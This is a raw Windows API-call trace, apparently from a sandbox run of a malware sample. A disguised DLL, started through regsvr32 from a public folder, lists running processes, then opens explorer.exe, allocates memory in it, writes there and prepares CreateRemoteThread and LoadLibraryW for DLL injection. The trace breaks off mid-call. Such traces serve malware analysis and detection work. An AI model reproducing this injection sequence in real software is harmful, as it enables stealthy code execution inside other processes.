[0260.531] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac [0260.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17e2d4, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe") returned 0x20 [0260.531] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96" [0260.531] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96" [0260.532] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96" [0260.532] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96" [0260.532] GetComputerNameW (in: lpBuffer=0x17e4cc, nSize=0x17e4c8 | out: lpBuffer="N3EERVTWSM", nSize=0x17e4c8) returned 1 [0260.532] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0260.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0260.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x86f4ec, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0260.532] GetProcAddress (hModule=0x77780000, lpProcName="CreateToolhelp32Snapshot") returned 0x777bf731 [0260.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0260.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x85288c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0260.532] GetProcAddress (hModule=0x77780000, lpProcName="Heap32ListFirst") returned 0x778102e7 [0260.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x85288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0260.533] GetProcAddress (hModule=0x77780000, lpProcName="Heap32ListNext") returned 0x77810391 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x85288c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0260.533] GetProcAddress (hModule=0x77780000, lpProcName="Heap32First") returned 0x77810429 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x85288c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0260.533] GetProcAddress (hModule=0x77780000, lpProcName="Heap32Next") returned 0x77810614 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x86f4ec, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0260.533] GetProcAddress (hModule=0x77780000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x77810819 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x85288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Process32First") returned 0x777e443d [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x85288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Process32Next") returned 0x777e4505 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x85288c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Process32FirstW") returned 0x777bfa35 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x85288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Process32NextW") returned 0x777bfaca [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x85288c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Process32FirstW") returned 0x777bfa35 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x85288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Process32NextW") returned 0x777bfaca [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x85288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0260.534] GetProcAddress (hModule=0x77780000, lpProcName="Thread32First") returned 0x777e7e4c [0260.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x85288c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0260.535] GetProcAddress (hModule=0x77780000, lpProcName="Thread32Next") returned 0x777e7edc [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x85288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0260.535] GetProcAddress (hModule=0x77780000, lpProcName="Module32First") returned 0x77810859 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x85288c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0260.535] GetProcAddress (hModule=0x77780000, lpProcName="Module32Next") returned 0x77810942 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x85288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0260.535] GetProcAddress (hModule=0x77780000, lpProcName="Module32FirstW") returned 0x777bc59e [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x85288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0260.535] GetProcAddress (hModule=0x77780000, lpProcName="Module32NextW") returned 0x777bc11f [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x85288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0260.535] GetProcAddress (hModule=0x77780000, lpProcName="Module32FirstW") returned 0x777bc59e [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x85288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0260.536] GetProcAddress (hModule=0x77780000, lpProcName="Module32NextW") returned 0x777bc11f [0260.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb0 [0260.538] Process32FirstW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.539] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.539] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.540] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.540] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.541] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.541] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.541] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.542] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.542] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.543] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.543] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.544] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.544] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.545] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.545] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.545] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.546] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0260.546] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0260.547] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x468, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.547] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.548] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.548] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.548] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x470, pcPriClassBase=8, dwFlags=0x0, szExeFile="jusched.exe")) returned 1 [0260.636] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x470, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0260.637] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.637] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.638] Process32NextW (in: hSnapshot=0xb0, lppe=0x17e2bc | out: lppe=0x17e2bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 0 [0260.638] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77780000 [0260.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0260.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x85286c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocEx", lpUsedDefaultChar=0x0) returned 14 [0260.638] GetProcAddress (hModule=0x77780000, lpProcName="VirtualAllocEx") returned 0x777bc1b6 [0260.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0260.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x86830c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemory", lpUsedDefaultChar=0x0) returned 18 [0260.639] GetProcAddress (hModule=0x77780000, lpProcName="WriteProcessMemory") returned 0x777bc1de [0260.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateRemoteThread", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0260.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateRemoteThread", cchWideChar=18, lpMultiByteStr=0x868384, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateRemoteThread", lpUsedDefaultChar=0x0) returned 18 [0260.639] GetProcAddress (hModule=0x77780000, lpProcName="CreateRemoteThread") returned 0x7780f33b [0260.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenProcess", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0260.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenProcess", cchWideChar=11, lpMultiByteStr=0x85288c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OpenProcess", lpUsedDefaultChar=0x0) returned 11 [0260.639] GetProcAddress (hModule=0x77780000, lpProcName="OpenProcess") returned 0x777c59d7 [0260.639] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x470) returned 0xb4 [0260.639] VirtualAllocEx (hProcess=0xb4, lpAddress=0x0, dwSize=0x42, flAllocationType=0x1000, flProtect=0x4) returned 0x3140000 [0260.639] WriteProcessMemory (in: hProcess=0xb4, lpBaseAddress=0x3140000, lpBuffer=0x88c2ec*, nSize=0x42, lpNumberOfBytesWritten=0x17e4d8 | out: lpBuffer=0x88c2ec*, lpNumberOfBytesWritten=0x17e4d8*=0x42) returned 1 [0262.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="LoadLibraryW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0262.962] WideCharToMultiByte (in: 